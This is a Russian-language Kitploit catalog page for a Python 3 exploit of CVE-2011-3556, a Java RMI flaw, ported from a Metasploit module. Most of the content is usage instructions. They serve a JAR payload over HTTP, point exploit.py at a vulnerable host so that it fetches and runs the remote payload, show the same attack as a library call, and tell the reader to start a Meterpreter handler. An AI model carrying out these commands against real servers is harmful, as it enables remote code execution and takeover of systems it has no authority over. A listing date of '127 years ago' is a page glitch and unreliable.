Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/sk4la/cve_2011_3556
Фреймворки для эксплойтовГенерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на Проникновение
GitHubsk4la/cve_2011_3556

cve_2011_3556

Реализация существующего proof of concept (PoC) для CVE-2011-3556 на Python 3.

Репозиторий
127 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2011-3556 — Доказательство концепции (PoC)

Отказ от ответственности

Этот инструмент представляет собой реализацию на Python 3 существующего доказательства концепции (PoC), созданного mihi для Metasploit Framework.

Предварительные требования

Для использования модуля просто следуйте инструкциям ниже:

root@kitploit:~
# Clone this repository locally.
$ git clone https://github.com/sk4la/cve_2011_3556.git && cd cve_2011_3556/

# Optionally set the `x` bit to be able to execute the script directly.
$ chmod u+x exploit.py

$ ./exploit.py --help && echo "It works!"

Использование

Командная строка

Чтобы полезная нагрузка (JAR-бинарник) была удаленно загружена уязвимым сервером Java RMI, она должна быть предоставлена как HTTP-ресурс. Можно быстро развернуть её с помощью известной команды .

python3 -m http.server

Как только полезная нагрузка станет доступна для загрузки, просто выполните скрипт exploit.py, чтобы активировать уязвимость.

root@kitploit:~
$ python3 -m http.server --bind DELIVERY_HOST DELIVERY_PORT &
$ ./exploit.py -h VULNERABLE_HOST -u http://DELIVERY_HOST:DELIVERY_PORT/PAYLOAD.jar`

В случае, если полезная нагрузка — Meterpreter (Metasploit Framework), не забудьте выполнить use exploit/multi/handler.

Библиотека

Этот модуль также можно использовать как библиотеку, импортировав модуль cve_2011_3556 в ваше пространство имен:

root@kitploit:~
from cve_2011_3556 import JavaRMIExploit

JavaRMIExploit("127.0.0.1", "http://127.0.0.1/payload.jar").exploit()

Всё так просто!

Благодарности

Особая благодарность mihi за первоначальную реализацию модуля для Metasploit Framework.

Скачать инструмент